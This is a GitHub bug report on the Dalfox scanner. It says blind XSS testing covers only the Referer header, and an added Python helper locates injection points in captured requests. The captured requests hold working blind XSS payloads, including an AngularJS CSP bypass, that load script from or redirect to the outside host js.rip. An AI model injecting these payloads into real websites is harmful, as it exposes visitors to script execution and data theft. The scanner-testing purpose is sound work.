Blind XSS not working #473

Open
anasbousselham opened this issue May 21, 2023 · 0 comments
Labels
bug Something isn't working

Comments

@anasbousselham

Hi,
Dalfox's blind test only covers the Referer: header, not the params in the POST request data or the queries in the URL.

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Referer: "'><script src=//js.rip/xxx></script>
Accept-Encoding: gzip, deflate
Connection: close

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Referer: "'><script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js></script><div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//js.rip/xxx'"></textarea></div>
Accept-Encoding: gzip, deflate
Connection: close

@anasbousselham anasbousselham added the bug Something isn't working label May 21, 2023
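To check a report like this against captured scanner traffic, the following added example (not part of the issue and not Dalfox code) lists which parts of a raw HTTP request carry a given callback marker. The function name `injection_points`, the second request and its parameter names `p` and `text` are constructed for illustration; the first request is the capture from the issue with some headers omitted.

```python
from urllib.parse import urlsplit, parse_qsl

# First capture from the issue above (some headers omitted); the body is empty.
CAPTURED = (
    "POST /guestbook.php HTTP/1.1\r\n"
    "Host: testphp.vulnweb.com\r\n"
    "Content-Length: 0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: \"'><script src=//js.rip/xxx></script>\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed for contrast: the same marker URL-encoded in a query parameter
# and a form body parameter. The names "p" and "text" are made up.
CONSTRUCTED = (
    "POST /guestbook.php?p=%2F%2Fjs.rip%2Fxxx HTTP/1.1\r\n"
    "Host: testphp.vulnweb.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "name=a&text=%2F%2Fjs.rip%2Fxxx"
)


def injection_points(raw, marker):
    """Return sorted 'kind:name' locations whose decoded value contains marker."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    target = lines[0].split(" ")[1]          # request-target from the request line
    hits = set()
    # Query string parameters (percent-decoded by parse_qsl).
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if marker in value:
            hits.add("query:" + name)
    # Header fields; remember the content type to decide how to read the body.
    ctype = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-type":
            ctype = value.strip().lower()
        if marker in value:
            hits.add("header:" + name.strip())
    # Form-encoded body parameters only.
    if ctype.startswith("application/x-www-form-urlencoded"):
        for name, value in parse_qsl(body, keep_blank_values=True):
            if marker in value:
                hits.add("body:" + name)
    return sorted(hits)
```

Run over a full proxy capture of a scan, an output that only ever contains `header:Referer` matches the behaviour described in the report.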